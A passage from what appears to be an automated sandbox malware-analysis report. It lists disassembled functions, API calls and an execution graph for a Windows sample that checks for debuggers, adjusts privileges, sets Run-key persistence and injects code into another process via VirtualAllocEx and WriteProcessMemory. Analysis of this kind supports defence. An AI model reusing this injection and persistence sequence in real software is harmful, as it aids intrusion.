                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2431052661D6C686D7309B68E4983AEB3A0FB95740F400126E68D87A59EF3DC40ACB04
                                                                                                                                                                                                                                  Function 00007FF6DAB8397C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43registryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.1404803306.00007FF6DAB81000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6DAB80000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.1404210370.00007FF6DAB80000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.1404895806.00007FF6DAB85000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.1404927542.00007FF6DAB88000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.1404957924.00007FF6DAB89000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.1405063489.00007FF6DAB8B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_7ff6dab80000_audiodg.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CloseOpenValue
                                                                                                                                                                                                                                  • String ID: Software\Microsoft\Windows\CurrentVersion\Run
                                                                                                                                                                                                                                  • API String ID: 779948276-1428018034
                                                                                                                                                                                                                                  • Opcode ID: 0861401507e3e28e0f8f7b1c81fb4f9c72ec93ea9459558044e0fcb2a0648aa1
                                                                                                                                                                                                                                  • Instruction ID: f8c04e2823dec85cb731d8b250a043fd85e6dbc67f7a6945d1769d5d071dd138
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0861401507e3e28e0f8f7b1c81fb4f9c72ec93ea9459558044e0fcb2a0648aa1
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4211633652CB8186D7908B28F44062E77A0FB857A0F105231F9AE83BE9DF7CD055CB00
                                                                                                                                                                                                                                  Function 00007FF6DAB81088 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16libraryloaderCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.1404803306.00007FF6DAB81000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6DAB80000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.1404210370.00007FF6DAB80000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.1404895806.00007FF6DAB85000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.1404927542.00007FF6DAB88000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.1404957924.00007FF6DAB89000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.1405063489.00007FF6DAB8B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_7ff6dab80000_audiodg.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                                  • String ID: GetThreadId$kernel32
                                                                                                                                                                                                                                  • API String ID: 1646373207-2383230424
                                                                                                                                                                                                                                  • Opcode ID: 189d8e18f2860e48d93cbf03eb1ea96f13b6a920ccedb7e9900926061dd2bf98
                                                                                                                                                                                                                                  • Instruction ID: b0c76720a3debce36847fbf8526186b160b82d54d2793cad8fdffb11187de8ba
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 189d8e18f2860e48d93cbf03eb1ea96f13b6a920ccedb7e9900926061dd2bf98
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B2E0922191EAC7C2D6609B34F85436D63A0FB85744F900676D58D82665DF3CD56ACB00
                                                                                                                                                                                                                                  Function 00007FF6DAB82F34 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 34memoryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00007FF6DAB8388C: SHGetFolderPathW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6DAB83A71), ref: 00007FF6DAB838D5
                                                                                                                                                                                                                                    • Part of subcall function 00007FF6DAB8388C: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6DAB83A71), ref: 00007FF6DAB838EA
                                                                                                                                                                                                                                    • Part of subcall function 00007FF6DAB8388C: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6DAB83A71), ref: 00007FF6DAB838FD
                                                                                                                                                                                                                                    • Part of subcall function 00007FF6DAB8388C: CreateDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6DAB83A71), ref: 00007FF6DAB8390D
                                                                                                                                                                                                                                    • Part of subcall function 00007FF6DAB8388C: SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6DAB83A71), ref: 00007FF6DAB83920
                                                                                                                                                                                                                                    • Part of subcall function 00007FF6DAB8388C: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6DAB83A71), ref: 00007FF6DAB83935
                                                                                                                                                                                                                                    • Part of subcall function 00007FF6DAB8388C: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6DAB83A71), ref: 00007FF6DAB83948
                                                                                                                                                                                                                                    • Part of subcall function 00007FF6DAB8388C: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6DAB83A71), ref: 00007FF6DAB8395D
                                                                                                                                                                                                                                    • Part of subcall function 00007FF6DAB8452C: CreateFileW.KERNEL32 ref: 00007FF6DAB84573
                                                                                                                                                                                                                                    • Part of subcall function 00007FF6DAB810D8: OpenProcess.KERNEL32 ref: 00007FF6DAB810FC
                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32 ref: 00007FF6DAB82FCF
                                                                                                                                                                                                                                  • HeapFree.KERNEL32 ref: 00007FF6DAB82FE2
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.1404803306.00007FF6DAB81000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6DAB80000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.1404210370.00007FF6DAB80000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.1404895806.00007FF6DAB85000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.1404927542.00007FF6DAB88000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.1404957924.00007FF6DAB89000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.1405063489.00007FF6DAB8B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_7ff6dab80000_audiodg.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: lstrcat$CreateFileHeapProcess$AttributesDirectoryFolderFreeOpenPath
                                                                                                                                                                                                                                  • String ID: .x64$chFrWWdQWsLFevUr
                                                                                                                                                                                                                                  • API String ID: 1115570603-2286007224
                                                                                                                                                                                                                                  • Opcode ID: 95aef461ef1f9e9f9686b8daab66f7c0abc0f7e40fb25e4f5403c42a13b66269
                                                                                                                                                                                                                                  • Instruction ID: 46bc8f0fd98f8dde3bc67653ad7fdd5e49c1be47eb00c075b38eb398940cebb6
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 95aef461ef1f9e9f9686b8daab66f7c0abc0f7e40fb25e4f5403c42a13b66269
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9111CB2191EA8386E620DBB8F8543AE73A0FB86784F404176D55CC6667DF7CD0668B40

                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                  Execution Coverage:23.7%
                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                  Signature Coverage:0%
                                                                                                                                                                                                                                  Total number of Nodes:475
                                                                                                                                                                                                                                  Total number of Limit Nodes:4
                                                                                                                                                                                                                                  execution_graph 850 7ff65d6f3414 910 7ff65d6f153c 850->910 855 7ff65d6f3434 1144 7ff65d6f40ac GetCurrentProcess OpenProcessToken 855->1144 856 7ff65d6f342c ExitProcess 860 7ff65d6f344f 861 7ff65d6f3464 860->861 862 7ff65d6f34b3 860->862 863 7ff65d6f41ec 3 API calls 861->863 867 7ff65d6f3504 862->867 868 7ff65d6f34c8 862->868 864 7ff65d6f3470 863->864 865 7ff65d6f348a ExitProcess 864->865 866 7ff65d6f3477 864->866 869 7ff65d6f41ec 3 API calls 866->869 876 7ff65d6f355a 867->876 877 7ff65d6f3519 867->877 1159 7ff65d6f41ec CreateMutexExA 868->1159 872 7ff65d6f3483 869->872 872->865 875 7ff65d6f3492 872->875 873 7ff65d6f34e3 1172 7ff65d6f3214 873->1172 874 7ff65d6f34db ExitProcess 1163 7ff65d6f32a4 875->1163 1177 7ff65d6f3a3c 876->1177 881 7ff65d6f41ec 3 API calls 877->881 885 7ff65d6f3525 881->885 882 7ff65d6f34e8 886 7ff65d6f34ef Sleep 882->886 887 7ff65d6f34fc ExitProcess 882->887 883 7ff65d6f355f 1183 7ff65d6f33a4 GetVersionExW 883->1183 884 7ff65d6f3497 889 7ff65d6f349e Sleep 884->889 890 7ff65d6f34ab ExitProcess 884->890 891 7ff65d6f3534 885->891 892 7ff65d6f352c ExitProcess 885->892 886->882 889->884 894 7ff65d6f3214 19 API calls 891->894 895 7ff65d6f3539 894->895 898 7ff65d6f3540 Sleep 895->898 899 7ff65d6f354d ExitProcess 895->899 896 7ff65d6f3572 900 7ff65d6f41ec 3 API calls 896->900 897 7ff65d6f35c6 CreateThread CreateThread CreateThread WaitForMultipleObjects ExitProcess 898->895 901 7ff65d6f357e 900->901 902 7ff65d6f3598 ExitProcess 901->902 903 7ff65d6f41ec 3 API calls 901->903 904 7ff65d6f3591 903->904 904->902 905 7ff65d6f35a0 904->905 906 7ff65d6f32a4 42 API calls 905->906 907 7ff65d6f35a5 906->907 908 7ff65d6f35ac Sleep 907->908 909 7ff65d6f35b9 ExitProcess 907->909 908->907 1185 7ff65d6f149c LoadLibraryA GetProcAddress 910->1185 912 7ff65d6f15c6 1186 7ff65d6f149c LoadLibraryA GetProcAddress 912->1186 914 7ff65d6f15e0 1187 7ff65d6f14ec LoadLibraryA GetProcAddress 914->1187 916 7ff65d6f15fa 1188 7ff65d6f14ec LoadLibraryA GetProcAddress 916->1188 918 7ff65d6f1614 1189 7ff65d6f14ec LoadLibraryA GetProcAddress 918->1189 920 7ff65d6f162e 1190 7ff65d6f14ec LoadLibraryA GetProcAddress 920->1190 922 7ff65d6f1648 1191 7ff65d6f14ec LoadLibraryA GetProcAddress 922->1191 924 7ff65d6f1662 1192 7ff65d6f14ec LoadLibraryA GetProcAddress 924->1192 926 7ff65d6f167c 1193 7ff65d6f14ec LoadLibraryA GetProcAddress 926->1193 928 7ff65d6f1696 1194 7ff65d6f14ec LoadLibraryA GetProcAddress 928->1194 930 7ff65d6f16b0 1195 7ff65d6f14ec LoadLibraryA GetProcAddress 930->1195 932 7ff65d6f16ca 1196 7ff65d6f149c LoadLibraryA GetProcAddress 932->1196 934 7ff65d6f16e4 1197 7ff65d6f149c LoadLibraryA GetProcAddress 934->1197 936 7ff65d6f16fe 1198 7ff65d6f149c LoadLibraryA GetProcAddress 936->1198 938 7ff65d6f1718 1199 7ff65d6f149c LoadLibraryA GetProcAddress 938->1199 940 7ff65d6f1732 1200 7ff65d6f14ec LoadLibraryA GetProcAddress 940->1200 942 7ff65d6f174c 1201 7ff65d6f14ec LoadLibraryA GetProcAddress 942->1201 944 7ff65d6f1766 1202 7ff65d6f14ec LoadLibraryA GetProcAddress 944->1202 946 7ff65d6f1780 1203 7ff65d6f14ec LoadLibraryA GetProcAddress 946->1203 948 7ff65d6f179a 1204 7ff65d6f14ec LoadLibraryA GetProcAddress 948->1204 950 7ff65d6f17b4 1205 7ff65d6f14ec LoadLibraryA GetProcAddress 950->1205 952 7ff65d6f17ce 1206 7ff65d6f14ec LoadLibraryA GetProcAddress 952->1206 954 7ff65d6f17e8 1207 7ff65d6f14ec LoadLibraryA GetProcAddress 954->1207 956 7ff65d6f1802 1208 7ff65d6f14ec LoadLibraryA GetProcAddress 956->1208 958 7ff65d6f181c 1209 7ff65d6f14ec LoadLibraryA GetProcAddress 958->1209 960 7ff65d6f1836 1210 7ff65d6f14ec LoadLibraryA GetProcAddress 960->1210 962 7ff65d6f1850 1211 7ff65d6f14ec LoadLibraryA GetProcAddress 962->1211 964 7ff65d6f186a 1212 7ff65d6f14ec LoadLibraryA GetProcAddress 964->1212 966 7ff65d6f1884 1213 7ff65d6f14ec LoadLibraryA GetProcAddress 966->1213 968 7ff65d6f189e 1214 7ff65d6f14ec LoadLibraryA GetProcAddress 968->1214 970 7ff65d6f18b8 1215 7ff65d6f14ec LoadLibraryA GetProcAddress 970->1215 972 7ff65d6f18d2 1216 7ff65d6f14ec LoadLibraryA GetProcAddress 972->1216 974 7ff65d6f18ec 1217 7ff65d6f14ec LoadLibraryA GetProcAddress 974->1217 976 7ff65d6f1906 1218 7ff65d6f14ec LoadLibraryA GetProcAddress 976->1218 978 7ff65d6f1920 1219 7ff65d6f14ec LoadLibraryA GetProcAddress 978->1219 980 7ff65d6f193a 1220 7ff65d6f14ec LoadLibraryA GetProcAddress 980->1220 982 7ff65d6f1954 1221 7ff65d6f14ec LoadLibraryA GetProcAddress 982->1221 984 7ff65d6f196e 1222 7ff65d6f14ec LoadLibraryA GetProcAddress 984->1222 986 7ff65d6f1988 1223 7ff65d6f14ec LoadLibraryA GetProcAddress 986->1223 988 7ff65d6f19a2 1224 7ff65d6f14ec LoadLibraryA GetProcAddress 988->1224 990 7ff65d6f19bc 1225 7ff65d6f14ec LoadLibraryA GetProcAddress 990->1225 992 7ff65d6f19d6 1226 7ff65d6f14ec LoadLibraryA GetProcAddress 992->1226 994 7ff65d6f19f0 1227 7ff65d6f14ec LoadLibraryA GetProcAddress 994->1227 996 7ff65d6f1a0a 1228 7ff65d6f14ec LoadLibraryA GetProcAddress 996->1228 998 7ff65d6f1a24 1229 7ff65d6f14ec LoadLibraryA GetProcAddress 998->1229 1000 7ff65d6f1a3e 1230 7ff65d6f14ec LoadLibraryA GetProcAddress 1000->1230 1002 7ff65d6f1a58 1231 7ff65d6f14ec LoadLibraryA GetProcAddress 1002->1231 1004 7ff65d6f1a72 1232 7ff65d6f14ec LoadLibraryA GetProcAddress 1004->1232 1006 7ff65d6f1a8c 1233 7ff65d6f14ec LoadLibraryA GetProcAddress 1006->1233 1008 7ff65d6f1aa6 1234 7ff65d6f14ec LoadLibraryA GetProcAddress 1008->1234 1010 7ff65d6f1ac0 1235 7ff65d6f14ec LoadLibraryA GetProcAddress 1010->1235 1012 7ff65d6f1ada 1236 7ff65d6f14ec LoadLibraryA GetProcAddress 1012->1236 1014 7ff65d6f1af4 1237 7ff65d6f14ec LoadLibraryA GetProcAddress 1014->1237 1016 7ff65d6f1b0e 1238 7ff65d6f14ec LoadLibraryA GetProcAddress 1016->1238 1018 7ff65d6f1b28 1239 7ff65d6f14ec LoadLibraryA GetProcAddress 1018->1239 1020 7ff65d6f1b42 1240 7ff65d6f14ec LoadLibraryA GetProcAddress 1020->1240 1022 7ff65d6f1b5c 1241 7ff65d6f14ec LoadLibraryA GetProcAddress 1022->1241 1024 7ff65d6f1b76 1242 7ff65d6f14ec LoadLibraryA GetProcAddress 1024->1242 1026 7ff65d6f1b90 1243 7ff65d6f14ec LoadLibraryA GetProcAddress 1026->1243 1028 7ff65d6f1baa 1244 7ff65d6f14ec LoadLibraryA GetProcAddress 1028->1244 1030 7ff65d6f1bc4 1245 7ff65d6f14ec LoadLibraryA GetProcAddress 1030->1245 1032 7ff65d6f1bde 1246 7ff65d6f14ec LoadLibraryA GetProcAddress 1032->1246 1034 7ff65d6f1bf8 1247 7ff65d6f14ec LoadLibraryA GetProcAddress 1034->1247 1036 7ff65d6f1c12 1248 7ff65d6f14ec LoadLibraryA GetProcAddress 1036->1248 1038 7ff65d6f1c2c 1249 7ff65d6f14ec LoadLibraryA GetProcAddress 1038->1249 1040 7ff65d6f1c46 1250 7ff65d6f14ec LoadLibraryA GetProcAddress 1040->1250 1042 7ff65d6f1c60 1251 7ff65d6f14ec LoadLibraryA GetProcAddress 1042->1251 1044 7ff65d6f1c7a 1252 7ff65d6f14ec LoadLibraryA GetProcAddress 1044->1252 1046 7ff65d6f1c94 1253 7ff65d6f14ec LoadLibraryA GetProcAddress 1046->1253 1048 7ff65d6f1cae 1254 7ff65d6f14ec LoadLibraryA GetProcAddress 1048->1254 1050 7ff65d6f1cc8 1255 7ff65d6f14ec LoadLibraryA GetProcAddress 1050->1255 1052 7ff65d6f1ce2 1256 7ff65d6f14ec LoadLibraryA GetProcAddress 1052->1256 1054 7ff65d6f1cfc 1257 7ff65d6f14ec LoadLibraryA GetProcAddress 1054->1257 1056 7ff65d6f1d16 1258 7ff65d6f14ec LoadLibraryA GetProcAddress 1056->1258 1058 7ff65d6f1d30 1259 7ff65d6f14ec LoadLibraryA GetProcAddress 1058->1259 1060 7ff65d6f1d4a 1260 7ff65d6f14ec LoadLibraryA GetProcAddress 1060->1260 1062 7ff65d6f1d64 1261 7ff65d6f14ec LoadLibraryA GetProcAddress 1062->1261 1064 7ff65d6f1d7e 1262 7ff65d6f14ec LoadLibraryA GetProcAddress 1064->1262 1066 7ff65d6f1d98 1263 7ff65d6f14ec LoadLibraryA GetProcAddress 1066->1263 1068 7ff65d6f1db2 1264 7ff65d6f14ec LoadLibraryA GetProcAddress 1068->1264 1070 7ff65d6f1dcc 1265 7ff65d6f14ec LoadLibraryA GetProcAddress 1070->1265 1072 7ff65d6f1de6 1266 7ff65d6f14ec LoadLibraryA GetProcAddress 1072->1266 1074 7ff65d6f1e00 1267 7ff65d6f14ec LoadLibraryA GetProcAddress 1074->1267 1076 7ff65d6f1e1a 1268 7ff65d6f14ec LoadLibraryA GetProcAddress 1076->1268 1078 7ff65d6f1e34 1269 7ff65d6f14ec LoadLibraryA GetProcAddress 1078->1269 1080 7ff65d6f1e4e 1270 7ff65d6f14ec LoadLibraryA GetProcAddress 1080->1270 1082 7ff65d6f1e68 1271 7ff65d6f14ec LoadLibraryA GetProcAddress 1082->1271 1084 7ff65d6f1e82 1272 7ff65d6f14ec LoadLibraryA GetProcAddress 1084->1272 1086 7ff65d6f1e9c 1273 7ff65d6f14ec LoadLibraryA GetProcAddress 1086->1273 1088 7ff65d6f1eb6 1274 7ff65d6f14ec LoadLibraryA GetProcAddress 1088->1274 1090 7ff65d6f1ed0 1275 7ff65d6f14ec LoadLibraryA GetProcAddress 1090->1275 1092 7ff65d6f1eea 1276 7ff65d6f14ec LoadLibraryA GetProcAddress 1092->1276 1094 7ff65d6f1f04 1277 7ff65d6f14ec LoadLibraryA GetProcAddress 1094->1277 1096 7ff65d6f1f1e 1278 7ff65d6f14ec LoadLibraryA GetProcAddress 1096->1278 1098 7ff65d6f1f38 1279 7ff65d6f14ec LoadLibraryA GetProcAddress 1098->1279 1100 7ff65d6f1f52 1280 7ff65d6f14ec LoadLibraryA GetProcAddress 1100->1280 1102 7ff65d6f1f6c 1281 7ff65d6f14ec LoadLibraryA GetProcAddress 1102->1281 1104 7ff65d6f1f86 1282 7ff65d6f14ec LoadLibraryA GetProcAddress 1104->1282 1106 7ff65d6f1fa0 1283 7ff65d6f14ec LoadLibraryA GetProcAddress 1106->1283 1108 7ff65d6f1fba 1284 7ff65d6f149c LoadLibraryA GetProcAddress 1108->1284 1110 7ff65d6f1fd4 1285 7ff65d6f14ec LoadLibraryA GetProcAddress 1110->1285 1112 7ff65d6f1fee 1286 7ff65d6f14ec LoadLibraryA GetProcAddress 1112->1286 1114 7ff65d6f2008 1287 7ff65d6f14ec LoadLibraryA GetProcAddress 1114->1287 1116 7ff65d6f2022 1288 7ff65d6f14ec LoadLibraryA GetProcAddress 1116->1288 1118 7ff65d6f203c 1289 7ff65d6f14ec LoadLibraryA GetProcAddress 1118->1289 1120 7ff65d6f2056 1290 7ff65d6f14ec LoadLibraryA GetProcAddress 1120->1290 1122 7ff65d6f2070 1291 7ff65d6f14ec LoadLibraryA GetProcAddress 1122->1291 1124 7ff65d6f208a 1292 7ff65d6f149c LoadLibraryA GetProcAddress 1124->1292 1126 7ff65d6f20a4 1293 7ff65d6f149c LoadLibraryA GetProcAddress 1126->1293 1128 7ff65d6f20be 1294 7ff65d6f14ec LoadLibraryA GetProcAddress 1128->1294 1130 7ff65d6f20d8 1295 7ff65d6f14ec LoadLibraryA GetProcAddress 1130->1295 1132 7ff65d6f20f2 1296 7ff65d6f14ec LoadLibraryA GetProcAddress 1132->1296 1134 7ff65d6f210c 1297 7ff65d6f14ec LoadLibraryA GetProcAddress 1134->1297 1136 7ff65d6f2126 1298 7ff65d6f14ec LoadLibraryA GetProcAddress 1136->1298 1138 7ff65d6f2140 1299 7ff65d6f14ec LoadLibraryA GetProcAddress 1138->1299 1140 7ff65d6f215a 1141 7ff65d6f31b4 IsDebuggerPresent 1140->1141 1142 7ff65d6f31c6 GetCurrentProcess CheckRemoteDebuggerPresent 1141->1142 1143 7ff65d6f31c2 1141->1143 1142->1143 1143->855 1143->856 1145 7ff65d6f40d2 GetTokenInformation 1144->1145 1146 7ff65d6f3439 1144->1146 1300 7ff65d6f3b1c VirtualAlloc 1145->1300 1155 7ff65d6f3cac GetModuleFileNameW 1146->1155 1148 7ff65d6f4103 GetTokenInformation 1149 7ff65d6f4130 CloseHandle 1148->1149 1152 7ff65d6f414a AdjustTokenPrivileges CloseHandle 1148->1152 1150 7ff65d6f3aec VirtualFree 1149->1150 1153 7ff65d6f4145 1150->1153 1301 7ff65d6f3aec 1152->1301 1153->1146 1156 7ff65d6f3d9a wcsncpy 1155->1156 1157 7ff65d6f3cd7 PathFindFileNameW wcslen 1155->1157 1158 7ff65d6f3d11 1156->1158 1157->1158 1158->860 1160 7ff65d6f34d4 1159->1160 1161 7ff65d6f4218 GetLastError 1159->1161 1160->873 1160->874 1161->1160 1162 7ff65d6f4225 CloseHandle 1161->1162 1162->1160 1304 7ff65d6f388c 1163->1304 1165 7ff65d6f32b5 1308 7ff65d6f452c 1165->1308 1167 7ff65d6f32cd 1168 7ff65d6f330f CreateThread 1167->1168 1321 7ff65d6f408c 1167->1321 1168->884 1173 7ff65d6f388c 10 API calls 1172->1173 1174 7ff65d6f3224 1173->1174 1356 7ff65d6f42fc 1174->1356 1178 7ff65d6f370c 3 API calls 1177->1178 1179 7ff65d6f3a67 1178->1179 1180 7ff65d6f388c 10 API calls 1179->1180 1181 7ff65d6f3a71 GetModuleFileNameW 1180->1181 1182 7ff65d6f3a92 1181->1182 1182->883 1184 7ff65d6f33d5 1183->1184 1184->896 1184->897 1185->912 1186->914 1187->916 1188->918 1189->920 1190->922 1191->924 1192->926 1193->928 1194->930 1195->932 1196->934 1197->936 1198->938 1199->940 1200->942 1201->944 1202->946 1203->948 1204->950 1205->952 1206->954 1207->956 1208->958 1209->960 1210->962 1211->964 1212->966 1213->968 1214->970 1215->972 1216->974 1217->976 1218->978 1219->980 1220->982 1221->984 1222->986 1223->988 1224->990 1225->992 1226->994 1227->996 1228->998 1229->1000 1230->1002 1231->1004 1232->1006 1233->1008 1234->1010 1235->1012 1236->1014 1237->1016 1238->1018 1239->1020 1240->1022 1241->1024 1242->1026 1243->1028 1244->1030 1245->1032 1246->1034 1247->1036 1248->1038 1249->1040 1250->1042 1251->1044 1252->1046 1253->1048 1254->1050 1255->1052 1256->1054 1257->1056 1258->1058 1259->1060 1260->1062 1261->1064 1262->1066 1263->1068 1264->1070 1265->1072 1266->1074 1267->1076 1268->1078 1269->1080 1270->1082 1271->1084 1272->1086 1273->1088 1274->1090 1275->1092 1276->1094 1277->1096 1278->1098 1279->1100 1280->1102 1281->1104 1282->1106 1283->1108 1284->1110 1285->1112 1286->1114 1287->1116 1288->1118 1289->1120 1290->1122 1291->1124 1292->1126 1293->1128 1294->1130 1295->1132 1296->1134 1297->1136 1298->1138 1299->1140 1300->1148 1302 7ff65d6f3b10 1301->1302 1303 7ff65d6f3afd VirtualFree 1301->1303 1302->1146 1303->1302 1340 7ff65d6f370c GetWindowsDirectoryW 1304->1340 1306 7ff65d6f38bb SHGetFolderPathW lstrcatW lstrcatW CreateDirectoryW 1307 7ff65d6f3926 lstrcatW lstrcatW lstrcatW 1306->1307 1307->1165 1309 7ff65d6f4579 1308->1309 1310 7ff65d6f458d GetFileSize GetProcessHeap RtlAllocateHeap 1309->1310 1311 7ff65d6f4586 1309->1311 1312 7ff65d6f45e8 ReadFile 1310->1312 1313 7ff65d6f45d6 CloseHandle 1310->1313 1311->1167 1314 7ff65d6f460f GetProcessHeap HeapFree CloseHandle 1312->1314 1315 7ff65d6f4637 1312->1315 1313->1311 1314->1311 1316 7ff65d6f4650 GetProcessHeap HeapFree CloseHandle 1315->1316 1318 7ff65d6f4678 1315->1318 1316->1311 1317 7ff65d6f47e3 GetProcessHeap HeapFree CloseHandle 1317->1311 1318->1317 1319 7ff65d6f4733 GetProcessHeap RtlAllocateHeap 1318->1319 1320 7ff65d6f477c 1319->1320 1320->1317 1345 7ff65d6f3fcc CreateToolhelp32Snapshot 1321->1345 1324 7ff65d6f10d8 OpenProcess 1325 7ff65d6f1115 1324->1325 1326 7ff65d6f111f 1324->1326 1325->1168 1352 7ff65d6f13c4 GetModuleHandleA GetProcAddress 1326->1352 1328 7ff65d6f112c 1328->1325 1329 7ff65d6f11fe VirtualAllocEx 1328->1329 1329->1325 1330 7ff65d6f124f WriteProcessMemory 1329->1330 1330->1325 1331 7ff65d6f1286 WriteProcessMemory 1330->1331 1331->1325 1332 7ff65d6f12d1 1331->1332 1354 7ff65d6f1444 GetSystemInfo 1332->1354 1335 7ff65d6f12fe GetModuleHandleA GetProcAddress 1335->1325 1337 7ff65d6f1338 1335->1337 1336 7ff65d6f1444 GetSystemInfo 1338 7ff65d6f12f4 1336->1338 1337->1325 1339 7ff65d6f1399 CloseHandle 1337->1339 1338->1335 1338->1339 1339->1325 1341 7ff65d6f3760 GetVolumeInformationW 1340->1341 1342 7ff65d6f3756 1340->1342 1343 7ff65d6f37dc 1341->1343 1342->1341 1344 7ff65d6f3846 wsprintfW 1343->1344 1344->1306 1346 7ff65d6f32fa 1345->1346 1347 7ff65d6f4007 Process32FirstW 1345->1347 1346->1324 1348 7ff65d6f4061 CloseHandle 1347->1348 1349 7ff65d6f4026 wcscmp 1347->1349 1348->1346 1350 7ff65d6f403d 1349->1350 1351 7ff65d6f404a Process32NextW 1349->1351 1350->1348 1351->1348 1351->1349 1353 7ff65d6f13ff 1352->1353 1353->1328 1355 7ff65d6f12ea 1354->1355 1355->1335 1355->1336 1357 7ff65d6f4345 1356->1357 1358 7ff65d6f4352 1357->1358 1359 7ff65d6f4373 GetLastError 1357->1359 1363 7ff65d6f424c GetFileSize 1358->1363 1361 7ff65d6f3237 CreateThread Sleep CreateThread 1359->1361 1361->882 1368 7ff65d6f3b1c VirtualAlloc 1363->1368 1365 7ff65d6f4278 1366 7ff65d6f42c2 CloseHandle 1365->1366 1367 7ff65d6f428c SetFilePointer ReadFile 1365->1367 1366->1361 1367->1366 1368->1365 1369 7ff65d6f2f34 1370 7ff65d6f388c 10 API calls 1369->1370 1371 7ff65d6f2f73 1370->1371 1372 7ff65d6f452c 16 API calls 1371->1372 1373 7ff65d6f2f97 1372->1373 1374 7ff65d6f408c 5 API calls 1373->1374 1375 7ff65d6f2fba 1374->1375 1376 7ff65d6f10d8 10 API calls 1375->1376 1377 7ff65d6f2fcf GetProcessHeap HeapFree 1376->1377 1378 7ff65d6f2ea4 CreateMutexA 1379 7ff65d6f2ec9 ReleaseMutex CloseHandle 1378->1379 1380 7ff65d6f2ee6 GetLastError 1378->1380 1381 7ff65d6f2f28 1379->1381 1382 7ff65d6f2ef3 ReleaseMutex CloseHandle 1380->1382 1383 7ff65d6f2f10 ReleaseMutex CloseHandle 1380->1383 1382->1381 1383->1381 1386 7ff65d6f3384 1389 7ff65d6f24d4 GetModuleFileNameW 1386->1389 1390 7ff65d6f2555 1389->1390 1396 7ff65d6f2550 1389->1396 1391 7ff65d6f2593 1390->1391 1392 7ff65d6f25a9 1390->1392 1393 7ff65d6f259d 1391->1393 1394 7ff65d6f25c7 1391->1394 1432 7ff65d6f2414 ExpandEnvironmentStringsW 1392->1432 1393->1396 1434 